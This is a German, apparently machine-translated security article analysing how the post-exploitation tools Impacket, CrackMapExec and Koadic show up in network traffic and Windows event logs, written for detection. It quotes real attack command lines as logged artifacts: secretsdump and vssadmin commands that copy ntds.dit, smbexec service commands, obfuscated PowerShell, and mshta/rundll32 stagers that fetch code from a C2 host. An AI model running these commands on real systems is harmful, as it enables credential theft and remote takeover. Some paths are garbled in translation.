So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.

Die Anzahl der Angriffe im Unternehmenssektor nimmt von Jahr zu Jahr zu: beispielsweise 2017 wurden 13 % mehr einzigartige Vorfälle verzeichnet als im Jahr 2016, und im Jahr 2018 — gab es 27 % mehr Vorfälle, als im vorherigen Zeitraum. Darunter auch solche, bei denen das Hauptarbeitsmittel das Betriebssystem Windows ist. In den Jahren 2017–2018 führten die Gruppen APT Dragonfly, APT28, APT MuddyWater Angriffe auf Regierungs- und Militärorganisationen in Europa, Nordamerika und Saudi-Arabien durch. Dabei kamen drei Tools zum Einsatz — Impacket, CrackMapExec und Koadic. Ihr Quellcode ist offen und auf GitHub verfügbar.

Es ist erwähnenswert, dass diese Tools nicht für den anfänglichen Eindringlichkeitsangriff, sondern für die Entwicklung des Angriffs innerhalb der Infrastruktur verwendet werden. Angreifer verwenden sie in verschiedenen Phasen des Angriffs, die nach dem Überwinden des Perimeters folgen. Das lässt sich, nebenbei bemerkt, schwer erkennen und oft nur mit Technologien zur Erkennung von Kompromittierungsnachweisen im Netzwerkverkehr oder Tools, die es ermöglichen, aktive Aktivitäten des Angreifers nach seinem Eindringen in die Infrastruktur zu entdecken.. Die Werkzeuge bieten eine Vielzahl von Funktionen – von Dateiübertragungen bis hin zur Interaktion mit dem Register und der Ausführung von Befehlen auf einem Remote-System. Wir haben diese Werkzeuge untersucht, um deren Netzwerkaktivität zu bestimmen.

Was wir zu tun hatten:

  • Verstehen, wie das Hacker-Toolset funktioniert. Herausfinden, was Angreifer benötigen, um auszunutzen und welche Technologien sie verwenden können.
  • Identifizieren, was von Informationssicherheitslösungen in den frühen Angriffsstadien nicht erkannt wird. Die Reconnaissance-Phase kann übersprungen werden, entweder weil der Angreifer ein interner Bedrohungsakteur ist oder weil der Angreifer eine zuvor unbekannte Schwachstelle in der Infrastruktur nutzt. Dadurch ergibt sich die Möglichkeit, die gesamte Kette seiner Aktivitäten zurückzuverfolgen, was den Wunsch weckt, weitere Bewegungen zu erkennen.
  • False Positives von Intrusion Detection Systemen eliminieren. Es ist wichtig zu beachten, dass bei der Entdeckung bestimmter Aktionen basierend auf reiner Aufklärung häufig Fehler auftreten können. In der Regel gibt es in der Infrastruktur viele Möglichkeiten, Informationen zu beziehen, die auf den ersten Blick legitim erscheinen.

Was bieten diese Tools den Angreifern? Wenn es sich um Impacket handelt, erhalten die Kriminellen eine große Bibliothek von Modulen, die in verschiedenen Phasen eines Angriffs nach dem Überwinden des Sicherheitsperimeters eingesetzt werden können. Viele Tools verwenden interne Impacket-Module – beispielsweise Metasploit. Dieses beinhaltet dcomexec und wmiexec für die remote Ausführung von Befehlen sowie secretsdump zum Extrahieren von Anmeldedaten aus dem Speicher, die aus Impacket stammen. Letztendlich gewährleistet die korrekte Erkennung von Aktivitäten solcher Bibliotheken auch die Entdeckung von Ableitungen.

Über CrackMapExec (oder einfach CME) haben die Entwickler nicht ohne Grund geschrieben: „Powered by Impacket“. Darüber hinaus verfügt CME über integrierte Funktionen für gängige Szenarien: Dazu gehören Mimikatz zum Abrufen von Passwörtern oder deren Hashes, die Implementierung von Meterpreter oder Empire Agent für die entfernte Ausführung sowie Bloodhound an Bord.

Das dritte von uns ausgewählte Tool ist Koadic. Es ist relativ neu und wurde auf der internationalen Hacker-Konferenz DEFCON 25 im Jahr 2017 vorgestellt. Koadic zeichnet sich durch einen unkonventionellen Ansatz aus: Es funktioniert über HTTP, JavaScript und Microsoft Visual Basic Script (VBS). Dieser Ansatz wird als "living off the land" bezeichnet: Das Tool nutzt vorhandene Abhängigkeiten und Bibliotheken, die in Windows integriert sind. Die Entwickler nennen es COM Command & Control, oder C3.

IMPACKET

Die Funktionalität von Impacket ist äußerst vielfältig. Sie reicht von der Erkundung innerhalb von Active Directory und dem Datensammeln von internen MS SQL-Servern bis hin zu Techniken für den Erwerb von Anmeldeinformationen: Dazu gehören Angriffe über SMB Relay und das Abrufen der ntds.dit-Datei vom Domain Controller, die die Passwort-Hashes der Benutzer enthält. Zudem führt Impacket remote Befehle aus, indem es vier verschiedene Methoden verwendet: über WMI, den Windows Task Scheduler Service, DCOM und SMB, wobei es dafür Anmeldeinformationen benötigt.

Secretsdump

Lassen Sie uns secretsdump näher betrachten. Dieses Modul kann sowohl Benutzermaschinen als auch Domänencontroller angreifen. Damit können Kopien der Speicherbereiche LSA, SAM, SECURITY und NTDS.dit abgerufen werden, was es in verschiedenen Angriffsphasen sichtbar macht. Der erste Schritt bei der Nutzung des Moduls ist die Authentifizierung über SMB, für die entweder das Benutzerpasswort oder der Hash benötigt wird, um einen automatisierten Pass-the-Hash-Angriff durchzuführen. Danach erfolgt eine Anfrage zur Eröffnung des Zugangs zum Service Control Manager (SCM) und zum Zugriff auf die Registry über das winreg-Protokoll, mit dem der Angreifer Informationen über die relevanten Zweige herausfinden und Ergebnisse über SMB abrufen kann.

In Abb. 1 sehen wir, wie der Zugriff auf den Registry-Schlüssel mit LSA über das winreg-Protokoll erfolgt. Dazu wird der DCERPC-Befehl mit dem Opcode 15 — OpenKey — verwendet.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 1. Öffnen des Registry-Schlüssels über das winreg-Protokoll

Nachdem der Zugriff über den Schlüssel erhalten wurde, werden die Werte mit dem Befehl SaveKey und dem Opcode 20 gespeichert. Impacket geht hierbei sehr spezifisch vor. Es speichert die Werte in einer Datei, deren Name aus einer Zeichenfolge mit 8 zufälligen Zeichen und der Endung .tmp besteht. Darüber hinaus erfolgt der Export dieser Datei über SMB aus dem Verzeichnis System32 (Abb. 2).

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 2. Schema zum Abrufen des Registry-Schlüssels von einem Remote-Computer

Daraus ergibt sich, dass solche Aktivitäten im Netzwerk anhand von Anfragen an bestimmte Zweige der Registry über das Protokoll winreg, spezifischen Namen, Befehlen und deren Reihenfolge erkannt werden können.

Dieses Modul hinterlässt außerdem Spuren im Windows-Ereignisprotokoll, wodurch es leicht zu erkennen ist. Zum Beispiel zeigt die Ausführung des Befehls

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Im Ereignisprotokoll von Windows Server 2016 sehen wir die folgende Schlüsselereigniskette:

1. 4624 – Remote-Logon.
2. 5145 – Überprüfung der Zugriffsrechte auf den Remote-Service winreg.
3. 5145 – Überprüfung der Zugriffsrechte auf die Datei im Verzeichnis System32. Die Datei hat den oben erwähnten zufälligen Namen.
4. 4688 — Prozess cmd.exe erstellen, der vssadmin ausführt:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 — Prozess mit Befehl erstellen:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 — Prozess mit Befehl erstellen:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%Temp\rmumAfcn.tmp > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 — Prozess mit Befehl erstellen:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Wie bei vielen Post-Exploitation-Tools gibt es auch bei Impacket Module für die remote Ausführung von Befehlen. Wir konzentrieren uns auf smbexec, das eine interaktive Kommandozeile auf dem Remote-Rechner bereitstellt. Für dieses Modul ist zudem eine Authentifizierung über SMB erforderlich, entweder durch ein Passwort oder dessen Hash. In Abb. 3 sehen wir ein Beispiel für die Nutzung eines solchen Werkzeugs, hier ist es die Konsole des lokalen Administrators.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 3. Interaktive smbexec-Konsole

Der erste Schritt bei der Verwendung von smbexec nach der Authentifizierung ist das Öffnen des SCM mit dem Befehl OpenSCManagerW (15). Auffällig ist die Anfrage: Im Feld MachineName hat der Wert DUMMY.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 4. Anfrage zum Öffnen des Service Control Managers

Anschließend wird ein Dienst mit dem Befehl CreateServiceW (12) erstellt. Im Fall von smbexec können wir jedes Mal die gleiche Logik der Kommandobildung erkennen. In Abb. 5 sind die unveränderlichen Parameter des Befehls grün markiert, die von dem Angreifer veränderbaren Parameter in Gelb. Es ist nicht schwer zu erkennen, dass der Name der ausführbaren Datei, ihr Verzeichnis und die Ausgabedatei geändert werden können, aber die restlichen Parameter sind schwerer zu ändern, ohne die Logik des Impacket-Moduls zu stören.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 5. Anfrage zur Erstellung eines Dienstes mit Hilfe des Service Control Managers

Smbexec hinterlässt ebenfalls sichtbare Spuren im Windows-Ereignisprotokoll. Im Protokoll von Windows Server 2016 für die interaktive Eingabeaufforderung mit dem Befehl ipconfig sehen wir folgende Schlüsselereignisse:

1. 4697 — Dienstinstallation auf dem Opfercomputer:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 — Erstellung des Prozesses cmd.exe mit Argumenten aus Punkt 1.
3. 5145 — Überprüfung der Zugriffsrechte auf die Datei __output im Verzeichnis C$.
4. 4697 — Dienstinstallation auf dem Opfercomputer.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 — Erstellung des Prozesses cmd.exe mit Argumenten aus Punkt 4.
6. 5145 — Überprüfung der Zugriffsrechte auf die Datei __output im Verzeichnis C$.

Impacket bildet die Grundlage für die Entwicklung von Angriffswerkzeugen. Es unterstützt nahezu alle Protokolle der Windows-Infrastruktur und bringt dabei eigene charakteristische Merkmale mit sich. Dazu gehören spezifische winreg-Anfragen, die Verwendung der SCM-API mit typischer Befehlserstellung, das Format der Dateinamen sowie SMB-Freigaben im SYSTEM32-Verzeichnis.

CRACKMAPEXEC

Das CME-Tool hat in erster Linie die Aufgabe, die Routineaufgaben zu automatisieren, die ein Angreifer zur Fortbewegung innerhalb eines Netzwerks durchführen muss. Es ermöglicht die Zusammenarbeit mit den bekannten Tools Empire Agent und Meterpreter. Um Befehle im Verborgenen auszuführen, kann CME diese obfuskieren. Mit Bloodhound (einem separaten Tool zur Durchführung von Aufklärung) kann der Angreifer die Suche nach aktiven Sitzungen des Domänenadministrators automatisieren.

Bloodhound

Bloodhound als eigenständiges Tool ermöglicht eine fortschrittliche Aufklärung innerhalb des Netzwerks. Es sammelt Daten über Benutzer, Maschinen, Gruppen, Sitzungen und wird in Form eines PowerShell-Skripts oder einer Binärdatei bereitgestellt. Zur Informationssammlung werden LDAP oder auf SMB basierende Protokolle verwendet. Das Integrationsmodul CME ermöglicht das Hochladen von Bloodhound auf das Zielsystem, das Starten und das Abrufen der gesammelten Daten nach der Ausführung, wodurch die Aktionen im System automatisiert und weniger sichtbar gemacht werden. Die grafische Oberfläche von Bloodhound stellt die gesammelten Daten in Form von Graphen dar, was es ermöglicht, den kürzesten Weg vom angreifenden Rechner zum Domänenadministrator zu finden.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 6. Benutzeroberfläche von Bloodhound

Um auf dem Zielrechner zu starten, erstellt das Modul eine Aufgabe mithilfe von ATSVC und SMB. ATSVC ist eine Schnittstelle für den Windows-Aufgabenplaner. CME verwendet dessen Funktion NetrJobAdd (1), um Aufgaben über das Netzwerk zu erstellen. Ein Beispiel dafür, was das CME-Modul sendet, ist in Abbildung 7 dargestellt: das Aufrufen von cmd.exe und obfuskierten Code in Form von Argumenten im XML-Format.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abbildung 7. Erstellung einer Aufgabe über CME

Nachdem die Aufgabe zur Ausführung gekommen ist, startet die Zielmaschine Bloodhound selbst, und dies ist im Verkehr sichtbar. Für das Modul sind LDAP-Anfragen typisch, um Standardgruppen, eine Liste aller Maschinen und Benutzer in der Domäne sowie Informationen zu aktiven Benutzersitzungen über die SRVSVC NetSessEnum-Anfrage zu erhalten.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abbildung 8. Abrufen der Liste aktiver Sitzungen über SMB

Darüber hinaus wird der Start von Bloodhound auf der Zielmaschine mit aktiviertem Audit durch ein Ereignis mit der ID 4688 (Prozess erstellt) und dem Namen des Prozesses begleitet. „C:\Windows\System32\cmd.exe“. Bemerkenswert sind die Argumente der Befehlszeile:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91, 78, 101, 116, 46, 83, 101, … , 40, 41 )-jOIN'' ) "

Enum_avproducts

In Bezug auf Funktionalität und Implementierung ist das Modul enum_avproducts äußerst interessant. WMI ermöglicht es, mit der Abfragesprache WQL Daten zu verschiedenen Windows-Objekten abzurufen, was dieses Modul CME nutzt. Es generiert Abfragen an die Klassen AntiSpywareProduct und AntiМirusProduct bezüglich der auf dem System des Opfers installierten Schutzmaßnahmen. Um die benötigten Informationen zu erhalten, stellt das Modul eine Verbindung zum Namensraum rootSecurityCenter2 her, formt dann die WQL-Abfrage und erhält eine Antwort. In Abb. 9 sind die Inhalte solcher Abfragen und Antworten dargestellt. In unserem Beispiel wurde Windows Defender gefunden.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 9. Netzwerkaktivität des Moduls enum_avproducts

Häufig kann die WMI-Auditierung (Trace WMI-Activity), in den Ereignissen, die nützliche Informationen über WQL-Abfragen enthalten, deaktiviert sein. Wenn sie jedoch aktiviert ist, wird beim Ausführen des Scripts enum_avproducts ein Ereignis mit der ID 11 gespeichert. Es enthält den Benutzernamen, der die Abfrage gesendet hat, sowie den Namen im Namensraum rootSecurityCenter2.

Jedes der CME-Module weist spezifische Artefakte auf, sei es spezifische WQL-Abfragen oder die Erstellung einer bestimmten Art von Aufgabe im Aufgabenplaner mit Obfuskation und charakteristischer Bloodhound-Aktivität in LDAP und SMB.

KOADIC

Ein herausragendes Merkmal von Koadic ist die Nutzung der in Windows integrierten JavaScript- und VBScript-Interpreter. In diesem Sinne folgt es dem Trend "living off the land" — das heißt, es hat keine externen Abhängigkeiten und verwendet die Standardmittel von Windows. Es ist ein vollständiges Command & Control (CnC)-Werkzeug, da nach der Infektion ein "Implantat" auf dem Rechner installiert wird, das dessen Kontrolle ermöglicht. Ein solcher Rechner wird in der Terminologie von Koadic als "Zombie" bezeichnet. Wenn die Berechtigungen auf der Seite des Opfers für eine vollständige Nutzung nicht ausreichen, bietet Koadic die Möglichkeit, diese durch Techniken zur Umgehung der Benutzerkontensteuerung (UAC-Bypass) anzuheben.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abbildung 10. Koadic Kommandozeilen-Shell

Das Opfer muss die Kommunikation mit dem Command & Control-Server selbst initiieren. Dazu muss es eine zuvor vorbereitete URI ansprechen und den Hauptinhalt von Koadic über einen der Stager abrufen. In Abbildung 11 ist ein Beispiel für den Stager mshta dargestellt.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abbildung 11. Initialisierung einer Sitzung mit dem CnC-Server

Aus der WS-Antwort wird offensichtlich, dass die Ausführung über WScript.Shell erfolgt. Die Variablen STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH und EXPIRE enthalten entscheidende Informationen über die Parameter der aktuellen Sitzung. Dies ist das erste Anforderungs-Antwort-Paar in der HTTP-Verbindung zum CnC-Server. Die nachfolgenden Anfragen sind direkt mit der Funktionalität der aufgerufenen Module (Implants) verbunden. Alle Koadic-Module arbeiten ausschließlich mit einer aktiven Sitzung beim CnC.

Mimikatz

Ähnlich wie CME mit Bloodhound arbeitet, verwendet Koadic Mimikatz als eigenständiges Programm und bietet mehrere Möglichkeiten zu seiner Ausführung. Im Folgenden ist ein Anforderungs-Antwort-Paar zum Herunterladen des Mimikatz-Implants dargestellt.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 12. Übertragung von Mimikatz in Koadic

Es ist bemerkenswert, wie sich das URI-Format in der Anfrage geändert hat. Ein Wert für die Variable csrf, die den ausgewählten Modus repräsentiert, ist hinzugefügt worden. Ignorieren Sie den Namen; wir alle wissen, dass CSRF normalerweise etwas anderes bedeutet. Die Antwort enthält den gleichen Hauptinhalt von Koadic, ergänzt durch den Code, der mit Mimikatz in Verbindung steht. Dieser ist ziemlich umfangreich, daher konzentrieren wir uns auf die Schlüsselpunkte. Vor uns sehen wir eine in base64 kodierte Mimikatz-Bibliothek, eine serialisierte .NET-Klasse, die diese injizieren wird, sowie die Argumente zum Starten von Mimikatz. Das Ergebnis der Ausführung wird unverschlüsselt über das Netzwerk übertragen.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 13. Ergebnis der Ausführung von Mimikatz auf der entfernten Maschine

Exec_cmd

Koadic enthält auch Module, die in der Lage sind, Kommandos remote auszuführen. Hier sehen wir die gleiche Methode zur Generierung von URIs sowie die vertrauten Variablen sid und csrf. Im Fall des exec_cmd-Moduls wird Code in den Körper eingefügt, der shell-Kommandos ausführen kann. Unten sehen Sie solchen Code, der in der HTTP-Antwort des CnC-Servers enthalten ist.

So erkennen Sie Angriffe auf Ihre Windows-Infrastruktur: Wir untersuchen die Werkzeuge der Hacker.
Abb. 14. Code des Exec_cmd-Implants

Die Variable GAWTUUGCFI mit dem bekannten Attribut WS ist notwendig, um den Code auszuführen. Damit kann der Implantat die Shell aufrufen und zwei Codezweige verarbeiten: shell.exec mit Rückgabe des Ausgabe-Streams und shell.run ohne Rückgabe.

Koadic ist kein typisches Werkzeug, hat jedoch seine Artefakte, die im legitimen Datenverkehr zu finden sind:

  • spezielle Formung von HTTP-Anfragen,
  • Verwendung der winHttpRequests API,
  • Erstellung eines WScript.Shell-Objekts über ActiveXObject,
  • großer ausführbarer Körper.

Die ursprüngliche Verbindung wird von einem Stager initiiert, wodurch die Möglichkeit entsteht, seine Aktivitäten über Windows-Ereignisse zu erkennen. Für mshta ist dieses Ereignis 4688, was die Erstellung eines Prozesses mit dem Startattribut anzeigt:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

Während der Ausführung von Koadic können auch andere Ereignisse 4688 mit Attributen gesehen werden, die es hervorragend charakterisieren:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Fazit

Der Trend, sich mit Bordmitteln zu behelfen, gewinnt bei Cyberkriminellen an Bedeutung. Sie nutzen integrierte Windows-Tools und Mechanismen für ihre Zwecke. Wir beobachten, dass beliebte Werkzeuge wie Koadic, CrackMapExec und Impacket, die diesem Prinzip folgen, zunehmend in Berichten über APTs auftauchen. Die Anzahl der Forks dieser Tools auf GitHub steigt ebenfalls, und es entstehen immer mehr neue (derzeit sind es bereits etwa tausend). Der Trend gewinnt an Beliebtheit aufgrund seiner Einfachheit: Cyberkriminelle benötigen keine externen Tools, da diese bereits auf den Maschinen der Opfer vorhanden sind und helfen, Schutzmaßnahmen zu umgehen. Wir konzentrieren uns darauf, das Netzwerkverhalten zu untersuchen: Jedes der oben genannten Werkzeuge hinterlässt seine Spuren im Netzwerkverkehr; eine detaillierte Analyse hat es uns ermöglicht, unser Produkt weiterzuentwickeln. PT Netzwerkangriffs-Entdeckung ihnen zu erkennen, was letztendlich hilft, die gesamte Kette von Cybervorfällen, an denen sie beteiligt sind, zu untersuchen.

Autoren:

  • Anton Tyurin, Leiter der Abteilung Expert Services, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, Experte, PT Expert Security Center, Positive Technologies

Quelle: habr.com

Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server 🔥 Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server | ProHoster